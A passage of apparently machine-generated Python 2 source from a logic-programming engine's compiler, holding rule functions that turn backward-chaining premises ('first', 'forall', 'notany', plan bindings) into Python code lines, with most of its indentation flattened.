engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
\
helpers.merge_patterns(context.lookup_data('patterns'), context.lookup_data('patterns_in'))):
context.end_save_all_undo()
mark2 = context.mark(True)
if rule.pattern(1).match_data(context, context,
(('STARTING_LINENO', context.lookup_data('start_lineno')),
"engine.assert_(%r, %r," % (context.lookup_data('kb_name'), context.lookup_data('entity_name')),
('INDENT', 15),
helpers.list_format(
("rule.pattern(%d).as_data(context)" % pat_num
for pat_num in context.lookup_data('pat_nums')),
'(', ')),'),
('ENDING_LINENO', context.lookup_data('end_lineno')),
"POPINDENT",
)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# A python assertion needs no extra compilation: match the goal arguments
# and succeed.
def python_assertion(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# Compiles each element of $bc_rules via the 'bc_rule' goal, accumulating
# the generated plan lines, goal functions and init lines.  The
# forall-style loop (forall356_worked) requires every element to compile.
def bc_rules(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
bc_plan_lines = []
bc_bc_funs = []
bc_bc_init = []
forall356_worked = True
for python_ans in \
context.lookup_data('bc_rules'):
mark2 = context.mark(True)
if rule.pattern(0).match_data(context, context, python_ans):
context.end_save_all_undo()
forall356_worked = False
flag_3 = False
with engine.prove(rule.rule_base.root_name, 'bc_rule', context,
(rule.pattern(1),
rule.pattern(0),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),)) \
as gen_3:
for x_3 in gen_3:
flag_3 = True
assert x_3 is None, \
"compiler.bc_rules: got unexpected plan from when clause 3"
bc_plan_lines.extend(context.lookup_data('bc_plan1'))
bc_bc_funs.append(context.lookup_data('bc_bc_fun1'))
bc_bc_init.append(context.lookup_data('bc_bc_init1'))
forall356_worked = True
if forall356_worked: break
if not flag_3:
raise AssertionError("compiler.bc_rules: 'when' clause 3 failed")
if not forall356_worked:
context.undo_to_mark(mark2)
break
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
if forall356_worked:
mark5 = context.mark(True)
if rule.pattern(5).match_data(context, context,
tuple(bc_plan_lines)):
context.end_save_all_undo()
mark6 = context.mark(True)
if rule.pattern(6).match_data(context, context,
tuple(bc_bc_funs)):
context.end_save_all_undo()
mark7 = context.mark(True)
if rule.pattern(7).match_data(context, context,
tuple(bc_bc_init)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark7)
else: context.end_save_all_undo()
context.undo_to_mark(mark6)
else: context.end_save_all_undo()
context.undo_to_mark(mark5)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# Compiles one backward-chaining rule: prove its premises, then assemble
# the generated goal function's head, success/failure bookkeeping and tail.
def bc_rule_(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
flag_1 = False
with engine.prove(rule.rule_base.root_name, 'bc_premises', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),)) \
as gen_1:
for x_1 in gen_1:
flag_1 = True
assert x_1 is None, \
"compiler.bc_rule_: got unexpected plan from when clause 1"
mark2 = context.mark(True)
if rule.pattern(8).match_data(context, context,
\
helpers.goal(context.lookup_data('rb_name'), context.lookup_data('name'), context.lookup_data('goal'),
context.lookup_data('prem_plan_lines'), context.lookup_data('python_lines'))):
context.end_save_all_undo()
mark3 = context.mark(True)
if rule.pattern(9).match_data(context, context,
(context.lookup_data('goal_fn_head'),
context.lookup_data('prem_fn_head'),
'rule.rule_base.num_bc_rule_successes += 1',
'yield context' if context.lookup_data('plan_lines') else 'yield',
context.lookup_data('prem_fn_tail'),
'rule.rule_base.num_bc_rule_failures += 1',
context.lookup_data('goal_fn_tail'),
)):
context.end_save_all_undo()
mark4 = context.mark(True)
if rule.pattern(10).match_data(context, context,
(context.lookup_data('goal_decl_lines'),
context.lookup_data('prem_decl_lines'),
"POPINDENT",
)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
else: context.end_save_all_undo()
context.undo_to_mark(mark3)
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
if not flag_1:
raise AssertionError("compiler.bc_rule_: 'when' clause 1 failed")
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# Compiles the full premise list; unnumbered plan lines (step None) come
# first, numbered plan lines are sorted by step.
def bc_premises(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
flag_1 = False
with engine.prove(rule.rule_base.root_name, 'bc_premises1', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),
rule.pattern(13),)) \
as gen_1:
for x_1 in gen_1:
flag_1 = True
assert x_1 is None, \
"compiler.bc_premises: got unexpected plan from when clause 1"
mark2 = context.mark(True)
if rule.pattern(14).match_data(context, context,
helpers.list_format(context.lookup_data('patterns'), '(', '))')):
context.end_save_all_undo()
mark3 = context.mark(True)
if rule.pattern(15).match_data(context, context,
('(' + ' '.join(tuple(repr(plan_var_name) + ','
for plan_var_name
in context.lookup_data('plan_var_names'))) +
'),',) + context.lookup_data('pat_lines')):
context.end_save_all_undo()
mark4 = context.mark(True)
if rule.pattern(16).match_data(context, context,
tuple(itertools.chain.from_iterable(itertools.chain(
(lines for step, lines in context.lookup_data('plan_lines1') if step is None),
(lines for step, lines
in sorted(((step, lines) for step, lines in context.lookup_data('plan_lines1')
if step is not None),
key=lambda t: t[0])))))):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
else: context.end_save_all_undo()
context.undo_to_mark(mark3)
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
if not flag_1:
raise AssertionError("compiler.bc_premises: 'when' clause 1 failed")
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# Base case: no premises left to compile.
def bc_premises1_0(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
rule.rule_base.num_bc_rule_successes += 1
yield
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# Recursive case: compile the first premise, then the rest, concatenating
# the plan lines, function heads and (reversed) function tails.
def bc_premises1_n(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
flag_1 = False
with engine.prove(rule.rule_base.root_name, 'bc_premise', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),
rule.pattern(13),)) \
as gen_1:
for x_1 in gen_1:
flag_1 = True
assert x_1 is None, \
"compiler.bc_premises1_n: got unexpected plan from when clause 1"
flag_2 = False
with engine.prove(rule.rule_base.root_name, 'bc_premises1', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(3),
rule.pattern(14),
rule.pattern(15),
rule.pattern(5),
rule.pattern(6),
rule.pattern(8),
rule.pattern(16),
rule.pattern(10),
rule.pattern(17),
rule.pattern(18),
rule.pattern(19),
rule.pattern(20),)) \
as gen_2:
for x_2 in gen_2:
flag_2 = True
assert x_2 is None, \
"compiler.bc_premises1_n: got unexpected plan from when clause 2"
mark3 = context.mark(True)
if rule.pattern(21).match_data(context, context,
context.lookup_data('plan_lines1') + context.lookup_data('plan_lines2')):
context.end_save_all_undo()
mark4 = context.mark(True)
if rule.pattern(22).match_data(context, context,
context.lookup_data('fn_head1') + context.lookup_data('fn_head2')):
context.end_save_all_undo()
mark5 = context.mark(True)
if rule.pattern(23).match_data(context, context,
context.lookup_data('fn_tail2') + context.lookup_data('fn_tail1')):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark5)
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
else: context.end_save_all_undo()
context.undo_to_mark(mark3)
if not flag_2:
raise AssertionError("compiler.bc_premises1_n: 'when' clause 2 failed")
if not flag_1:
raise AssertionError("compiler.bc_premises1_n: 'when' clause 1 failed")
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# Compiles a single premise into a "with engine.prove(...):" block and
# gathers the plan lines and plan variables it needs.
def bc_premise(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
context.lookup_data('clause_num') + 1):
context.end_save_all_undo()
mark2 = context.mark(True)
if rule.pattern(1).match_data(context, context,
context.lookup_data('kb_name') or "rule.rule_base.root_name"):
context.end_save_all_undo()
mark3 = context.mark(True)
if rule.pattern(2).match_data(context, context,
\
helpers.merge_patterns(context.lookup_data('arg_patterns'), context.lookup_data('patterns_in'))):
context.end_save_all_undo()
mark4 = context.mark(True)
if rule.pattern(3).match_data(context, context,
(('STARTING_LINENO', context.lookup_data('start_lineno')),
"with engine.prove(%s, %s, context," %
(context.lookup_data('kb_name2'), context.lookup_data('entity_name')),
('INDENT', 2),
('INDENT', 16),
helpers.list_format(('rule.pattern(%d)' % pat_num
for pat_num in context.lookup_data('pat_nums')),
'(', ')) \\'),
'POPINDENT',
"as gen_%d:" % context.lookup_data('clause_num'),
"for x_%d in gen_%d:" % (context.lookup_data('clause_num'), context.lookup_data('clause_num')),
('INDENT', 2),
)):
context.end_save_all_undo()
flag_5 = False
with engine.prove(rule.rule_base.root_name, 'add_required', context,
(rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),
rule.pattern(3),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),)) \
as gen_5:
for x_5 in gen_5:
flag_5 = True
assert x_5 is None, \
"compiler.bc_premise: got unexpected plan from when clause 5"
flag_6 = False
with engine.prove(rule.rule_base.root_name, 'gen_plan_lines', context,
(rule.pattern(5),
rule.pattern(6),
rule.pattern(7),
rule.pattern(11),
rule.pattern(12),
rule.pattern(13),
rule.pattern(14),
rule.pattern(15),
rule.pattern(16),
rule.pattern(17),
rule.pattern(18),)) \
as gen_6:
for x_6 in gen_6:
flag_6 = True
assert x_6 is None, \
"compiler.bc_premise: got unexpected plan from when clause 6"
mark7 = context.mark(True)
if rule.pattern(19).match_data(context, context,
helpers.merge_patterns(context.lookup_data('plan_vars_needed'),
context.lookup_data('plan_var_names_in'))):
context.end_save_all_undo()
mark8 = context.mark(True)
if rule.pattern(20).match_data(context, context,
context.lookup_data('fn_head2') + context.lookup_data('fn_head3') + (('ENDING_LINENO', context.lookup_data('end_lineno')),)):
context.end_save_all_undo()
mark9 = context.mark(True)
if rule.pattern(21).match_data(context, context,
(context.lookup_data('fn_tail3'),
() if context.lookup_data('break_cond') is None
else "if %s: break" % context.lookup_data('break_cond'),
context.lookup_data('fn_tail2'))):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark9)
else: context.end_save_all_undo()
context.undo_to_mark(mark8)
else: context.end_save_all_undo()
context.undo_to_mark(mark7)
if not flag_6:
raise AssertionError("compiler.bc_premise: 'when' clause 6 failed")
if not flag_5:
raise AssertionError("compiler.bc_premise: 'when' clause 5 failed")
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
else: context.end_save_all_undo()
context.undo_to_mark(mark3)
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# Compiles a 'first' premise: a firstN_worked flag breaks out of the
# nested premises after the first success.
def bc_first(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
"first%d_worked" % context.lookup_data('clause_num')):
context.end_save_all_undo()
flag_2 = False
with engine.prove(rule.rule_base.root_name, 'bc_premises1', context,
(rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(0),
rule.pattern(6),
rule.pattern(7),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),
rule.pattern(13),)) \
as gen_2:
for x_2 in gen_2:
flag_2 = True
assert x_2 is None, \
"compiler.bc_first: got unexpected plan from when clause 2"
flag_3 = False
with engine.prove(rule.rule_base.root_name, 'add_required', context,
(rule.pattern(14),
rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(12),
rule.pattern(13),
rule.pattern(15),
rule.pattern(16),)) \
as gen_3:
for x_3 in gen_3:
flag_3 = True
assert x_3 is None, \
"compiler.bc_first: got unexpected plan from when clause 3"
mark4 = context.mark(True)
if rule.pattern(17).match_data(context, context,
"%s = False" % context.lookup_data('break_cond')):
context.end_save_all_undo()
mark5 = context.mark(True)
if rule.pattern(18).match_data(context, context,
"%s = True" % context.lookup_data('break_cond')):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark5)
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
if not flag_3:
raise AssertionError("compiler.bc_first: 'when' clause 3 failed")
if not flag_2:
raise AssertionError("compiler.bc_first: 'when' clause 2 failed")
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# Compiles a 'forall' premise with no 'require' clause: just the nested
# premises' head and tail lines.
def bc_forall_None(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
flag_1 = False
with engine.prove(rule.rule_base.root_name, 'bc_premises1', context,
(rule.pattern(0),
rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),
rule.pattern(13),)) \
as gen_1:
for x_1 in gen_1:
flag_1 = True
assert x_1 is None, \
"compiler.bc_forall_None: got unexpected plan from when clause 1"
mark2 = context.mark(True)
if rule.pattern(14).match_data(context, context,
context.lookup_data('fn_head1') + context.lookup_data('fn_tail')):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
if not flag_1:
raise AssertionError("compiler.bc_forall_None: 'when' clause 1 failed")
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# Compiles a 'forall ... require' premise using forallN_worked flags to
# check that the required clause holds for every binding.
def bc_forall_require(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
"forall%d_worked" % context.lookup_data('start_lineno')):
context.end_save_all_undo()
mark2 = context.mark(True)
if rule.pattern(1).match_data(context, context,
"not forall%d_worked" % context.lookup_data('start_lineno')):
context.end_save_all_undo()
flag_3 = False
with engine.prove(rule.rule_base.root_name, 'bc_premises1', context,
(rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(1),
rule.pattern(7),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),
rule.pattern(13),
rule.pattern(14),)) \
as gen_3:
for x_3 in gen_3:
flag_3 = True
assert x_3 is None, \
"compiler.bc_forall_require: got unexpected plan from when clause 3"
flag_4 = False
with engine.prove(rule.rule_base.root_name, 'bc_premises1', context,
(rule.pattern(2),
rule.pattern(3),
rule.pattern(5),
rule.pattern(15),
rule.pattern(16),
rule.pattern(0),
rule.pattern(7),
rule.pattern(9),
rule.pattern(17),
rule.pattern(11),
rule.pattern(18),
rule.pattern(12),
rule.pattern(19),
rule.pattern(20),)) \
as gen_4:
for x_4 in gen_4:
flag_4 = True
assert x_4 is None, \
"compiler.bc_forall_require: got unexpected plan from when clause 4"
mark5 = context.mark(True)
if rule.pattern(21).match_data(context, context,
("forall%d_worked = True" % context.lookup_data('start_lineno'),
context.lookup_data('fn_head1'),
"forall%d_worked = False" % context.lookup_data('start_lineno'),
context.lookup_data('fn_head2'),
"forall%d_worked = True" % context.lookup_data('start_lineno'),
context.lookup_data('fn_tail2'),
context.lookup_data('fn_tail1'),
"if forall%d_worked:" % context.lookup_data('start_lineno'),
("INDENT", 2))):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark5)
if not flag_4:
raise AssertionError("compiler.bc_forall_require: 'when' clause 4 failed")
if not flag_3:
raise AssertionError("compiler.bc_forall_require: 'when' clause 3 failed")
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# Compiles a 'notany' premise of a backward-chaining rule: the generated
# code succeeds only when the nested premises all fail.
def bc_notany(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
"notany%d_worked" % context.lookup_data('start_lineno')):
context.end_save_all_undo()
mark2 = context.mark(True)
if rule.pattern(1).match_data(context, context,
"not notany%d_worked" % context.lookup_data('start_lineno')):
context.end_save_all_undo()
flag_3 = False
with engine.prove(rule.rule_base.root_name, 'bc_premises1', context,
(rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(1),
rule.pattern(7),
rule.pattern(8),
rule.pattern(9),
rule.pattern(10),
rule.pattern(11),
rule.pattern(12),
rule.pattern(13),
rule.pattern(14),)) \
as gen_3:
for x_3 in gen_3:
flag_3 = True
assert x_3 is None, \
"compiler.bc_notany: got unexpected plan from when clause 3"
mark4 = context.mark(True)
if rule.pattern(15).match_data(context, context,
("notany%d_worked = True" % context.lookup_data('start_lineno'),
context.lookup_data('fn_head1'),
"notany%d_worked = False" % context.lookup_data('start_lineno'),
context.lookup_data('fn_tail1'),
"if notany%d_worked:" % context.lookup_data('start_lineno'),
("INDENT", 2)) ):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark4)
if not flag_3:
raise AssertionError("compiler.bc_notany: 'when' clause 3 failed")
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# Emits the "assert x_N is None" check used when a premise must not
# return a plan.
def no_plan(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
('assert x_%d is None, \\' % context.lookup_data('clause_num'),
('INDENT', 2),
'"%(rb_name)s.%(rule_name)s: got unexpected plan from '
'when clause %(clause_num)d"' %
{'clause_num': context.lookup_data('clause_num'),
'rb_name': context.lookup_data('rb_name'),
'rule_name': context.lookup_data('rule_name')},
'POPINDENT',)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# Handles "as $var" on a premise: adds the plan variable's pattern and
# emits the plan-binding code via the 'plan_bindings' goal.
def as_plan(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
\
helpers.merge_pattern("contexts.variable(%r)" % context.lookup_data('pat_var_name'),
context.lookup_data('patterns_in'))):
context.end_save_all_undo()
flag_2 = False
with engine.prove(rule.rule_base.root_name, 'plan_bindings', context,
(rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),)) \
as gen_2:
for x_2 in gen_2:
flag_2 = True
assert x_2 is None, \
"compiler.as_plan: got unexpected plan from when clause 2"
rule.rule_base.num_bc_rule_successes += 1
yield
if not flag_2:
raise AssertionError("compiler.as_plan: 'when' clause 2 failed")
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# Binds a plan_spec's $plan_var pattern and emits the plan-binding code
# via the 'plan_bindings' goal.
def plan_spec(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
\
helpers.merge_pattern("contexts.variable(%r)" % context.lookup_data('plan_var_name'),
context.lookup_data('patterns_in'))):
context.end_save_all_undo()
flag_2 = False
with engine.prove(rule.rule_base.root_name, 'plan_bindings', context,
(rule.pattern(1),
rule.pattern(2),
rule.pattern(3),
rule.pattern(4),
rule.pattern(5),
rule.pattern(6),
rule.pattern(7),)) \
as gen_2:
for x_2 in gen_2:
flag_2 = True
assert x_2 is None, \
"compiler.plan_spec: got unexpected plan from when clause 2"
rule.rule_base.num_bc_rule_successes += 1
yield
if not flag_2:
raise AssertionError("compiler.plan_spec: 'when' clause 2 failed")
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# Reports "illegal plan_spec in forall" as a syntax error at the
# offending source position.
def illegal_plan_spec(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
helpers.syntax_error("illegal plan_spec in forall",
context.lookup_data('lineno'), context.lookup_data('lexpos'))):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# Emits the code that checks a premise returned a plan and matches it
# against the plan variable's pattern, with mark/undo bookkeeping.
def plan_bindings(rule, arg_patterns, arg_context):
engine = rule.rule_base.engine
patterns = rule.goal_arg_patterns()
if len(arg_patterns) == len(patterns):
context = contexts.bc_context(rule)
try:
if all(itertools.imap(lambda pat, arg:
pat.match_pattern(context, context,
arg, arg_context),
patterns,
arg_patterns)):
rule.rule_base.num_bc_rules_matched += 1
mark1 = context.mark(True)
if rule.pattern(0).match_data(context, context,
('assert x_%d is not None, \\' % context.lookup_data('clause_num'),
('INDENT', 2),
'"%(rb_name)s.%(rule_name)s: expected plan from '
'when clause %(clause_num)d"' %
{'clause_num': context.lookup_data('clause_num'),
'rb_name': context.lookup_data('rb_name'),
'rule_name': context.lookup_data('rule_name')},
'POPINDENT',
"mark%d = context.mark(True)" % context.lookup_data('clause_num'),
"if not rule.pattern(%d).match_data(context, context, "
"x_%d):" % (context.lookup_data('pat_num'), context.lookup_data('clause_num')),
('INDENT', 2),
'raise AssertionError("%(rb_name)s.%(rule_name)s: '
'plan match to $%(plan_var_name)s failed in '
'when clause %(clause_num)d")' %
{'clause_num': context.lookup_data('clause_num'),
'plan_var_name': context.lookup_data('plan_var_name'),
'rb_name': context.lookup_data('rb_name'),
'rule_name': context.lookup_data('rule_name')},
'POPINDENT',
"context.end_save_all_undo()")):
context.end_save_all_undo()
mark2 = context.mark(True)
if rule.pattern(1).match_data(context, context,
("context.undo_to_mark(mark%d)" % context.lookup_data('clause_num'),)):
context.end_save_all_undo()
rule.rule_base.num_bc_rule_successes += 1
yield
else: context.end_save_all_undo()
context.undo_to_mark(mark2)
else: context.end_save_all_undo()
context.undo_to_mark(mark1)
rule.rule_base.num_bc_rule_failures += 1
finally:
context.done()
# Premise-free rule function: succeeds as soon as the goal arguments match.
def not_required(rule, arg_patterns, arg_context):
  engine = rule.rule_base.engine
  patterns = rule.goal_arg_patterns()
  if len(arg_patterns) == len(patterns):
    context = contexts.bc_context(rule)
    try:
      if all(itertools.imap(lambda pat, arg:
                              pat.match_pattern(context, context,
                                                arg, arg_context),
                            patterns,
                            arg_patterns)):
        rule.rule_base.num_bc_rules_matched += 1
        rule.rule_base.num_bc_rule_successes += 1
        yield
        rule.rule_base.num_bc_rule_failures += 1
    finally:
      context.done()
# Generates the flag_<n> bookkeeping that makes a 'when' clause required:
# the emitted code raises AssertionError if the clause never succeeds.
def required(rule, arg_patterns, arg_context):
  engine = rule.rule_base.engine
  patterns = rule.goal_arg_patterns()
  if len(arg_patterns) == len(patterns):
    context = contexts.bc_context(rule)
    try:
      if all(itertools.imap(lambda pat, arg:
                              pat.match_pattern(context, context,
                                                arg, arg_context),
                            patterns,
                            arg_patterns)):
        rule.rule_base.num_bc_rules_matched += 1
        mark1 = context.mark(True)
        if rule.pattern(0).match_data(context, context,
              ("flag_%d = False" % context.lookup_data('clause_num'),
               context.lookup_data('fn_head1'),
               "flag_%d = True" % context.lookup_data('clause_num'),
              )):
          context.end_save_all_undo()
          mark2 = context.mark(True)
          if rule.pattern(1).match_data(context, context,
                (context.lookup_data('fn_tail1'),
                 "if not flag_%d:" % context.lookup_data('clause_num'),
                 ("INDENT", 2),
                 "raise AssertionError(\"%s.%s: 'when' clause %d failed\")"
                   % (context.lookup_data('rb_name'),
                      context.lookup_data('rule_name'),
                      context.lookup_data('clause_num')),
                 "POPINDENT",
                )):
            context.end_save_all_undo()
            rule.rule_base.num_bc_rule_successes += 1
            yield
          else: context.end_save_all_undo()
